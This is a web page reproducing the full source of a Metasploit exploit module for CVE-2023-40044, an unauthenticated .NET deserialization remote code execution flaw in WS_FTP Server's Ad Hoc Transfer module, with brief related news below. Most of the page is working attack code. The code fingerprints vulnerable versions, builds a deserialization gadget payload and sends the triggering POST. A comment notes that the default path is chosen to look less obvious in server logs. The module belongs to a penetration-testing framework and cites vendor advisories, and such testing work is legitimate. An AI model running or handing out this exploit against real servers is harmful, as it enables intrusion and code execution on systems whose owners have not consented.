Headline
Progress Software WS_FTP Unauthenticated Remote Code Execution
This Metasploit module exploits an unsafe .NET deserialization vulnerability to achieve unauthenticated remote code execution against a vulnerable WS_FTP server running the Ad Hoc Transfer module. All versions of WS_FTP Server prior to 2020.0.4 (version 8.7.4) and 2022.0.2 (version 8.8.2) are vulnerable to this issue. The vulnerability was originally discovered by AssetNote.
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Progress Software WS_FTP Unauthenticated Remote Code Execution', 'Description' => %q{ This module exploits an unsafe .NET deserialization vulnerability to achieve unauthenticated remote code execution against a vulnerable WS_FTP server running the Ad Hoc Transfer module. All versions of WS_FTP Server prior to 2020.0.4 (version 8.7.4) and 2022.0.2 (version 8.8.2) are vulnerable to this issue. The vulnerability was originally discovered by AssetNote. }, 'License' => MSF_LICENSE, 'Author' => [ 'sfewer-r7', # MSF Exploit & Rapid7 Analysis ], 'References' => [ ['CVE', '2023-40044'], ['URL', 'https://attackerkb.com/topics/bn32f9sNax/cve-2023-40044/rapid7-analysis'], ['URL', 'https://community.progress.com/s/article/WS-FTP-Server-Critical-Vulnerability-September-2023'], ['URL', 'https://www.assetnote.io/resources/research/rce-in-progress-ws-ftp-ad-hoc-via-iis-http-modules-cve-2023-40044'] ], 'DisclosureDate' => '2023-09-27', 'Platform' => %w[win], 'Arch' => [ARCH_CMD], # 5000 will allow the powershell payloads to work as they require ~4200 bytes. Notably, the ClaimsPrincipal and # TypeConfuseDelegate (but not TextFormattingRunProperties) gadget chains will fail if Space is too large (e.g. # 8192 bytes), as the encoded payload command is padded with leading whitespace characters (0x20) to consume # all the available payload space via ./modules/nops/cmd/generic.rb). 'Payload' => { 'Space' => 5000 }, 'Privileged' => false, # Code execution as `NT AUTHORITY\NETWORK SERVICE`. 'Targets' => [ [ 'Windows', {} ] ], 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true }, 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS] } ) ) register_options( [ # This URI path can be anything so long as it begins with /AHT/. We default ot /AHT/ as it is less obvious in # the IIS logs as to what the request is for, however the user can change this as needed if required. Msf::OptString.new('TARGET_URI', [ false, 'Target URI used to exploit the deserialization vulnerability. Must begin with /AHT/', '/AHT/']), ] ) end def check # As the vulnerability lies in the WS_FTP Ad Hoc Transfer (AHT) module, we query the index HTML file for AHT. res = send_request_cgi( 'method' => 'GET', 'uri' => '/AHT/AHT_UI/public/index.html' ) return CheckCode::Unknown('Connection failed') unless res title = Nokogiri::HTML(res.body).xpath('//head/title')&.text # We verify the target is running the AHT module, by inspecting the HTML heads title. if title == 'Ad Hoc Transfer' res = send_request_cgi( 'method' => 'GET', 'uri' => '/AHT/AHT_UI/public/js/app.min.js' ) return CheckCode::Unknown('Connection failed') unless res # The patched versions were released on September 2023. We can query the date stamp in the app.min.js file # to see when this file was built. If it is before Sept 2023, then we have a vulnerable version of WS_FTP, # but if it was build on Sept 2023 or after, it is not vulnerable. if res.code == 200 && res.body =~ %r{/\*! fileTransfer (\d+)-(\d+)-(\d+) \*/} day = ::Regexp.last_match(1).to_i month = ::Regexp.last_match(2).to_i year = ::Regexp.last_match(3).to_i description = "Detected a build date of #{day}-#{month}-#{year}" if year > 2023 || (year == 2023 && month >= 9) return CheckCode::Safe(description) end return CheckCode::Appears(description) end # If we couldn't get the JS build date, we at least know the target is WS_FTP with the Ad Hoc Transfer module. return CheckCode::Detected end CheckCode::Unknown end def exploit unless datastore['TARGET_URI'].start_with? '/AHT/' fail_with(Failure::BadConfig, 'The TARGET_URI must begin with /AHT/') end # All of these gadget chains will work. We pick a random one during exploitation. chains = %i[ClaimsPrincipal TypeConfuseDelegate TextFormattingRunProperties] gadget = ::Msf::Util::DotNetDeserialization.generate( payload.encoded, gadget_chain: chains.sample, formatter: :BinaryFormatter ) # We can reach the unsafe deserialization via either of these tags. We pick a random one during exploitation. tags = %w[AHT_DEFAULT_UPLOAD_PARAMETER AHT_UPLOAD_PARAMETER] message = Rex::MIME::Message.new part = message.add_part("::#{tags.sample}::#{Rex::Text.encode_base64(gadget)}\r\n", nil, nil, nil) part.header.set('name', rand_text_alphanumeric(8)) res = send_request_cgi( { 'uri' => normalize_uri(datastore['TARGET_URI']), 'ctype' => 'multipart/form-data; boundary=' + message.bound, 'method' => 'POST', 'data' => message.to_s } ) unless res&.code == 302 fail_with(Failure::UnexpectedReply, 'Failed to trigger vulnerability') end endend
Related news
Plus, Qakbot appears to be still active, despite efforts from the FBI and other international law enforcement agencies to disrupt the massive botnet.
Progress Software has released hotfixes for a critical security vulnerability, alongside seven other flaws, in the WS_FTP Server Ad hoc Transfer Module and in the WS_FTP Server manager interface. Tracked as CVE-2023-40044, the flaw has a CVSS score of 10.0, indicating maximum severity. All versions of the software are impacted by the flaw. "In WS_FTP Server versions prior to 8.7.4 and 8.8.2, a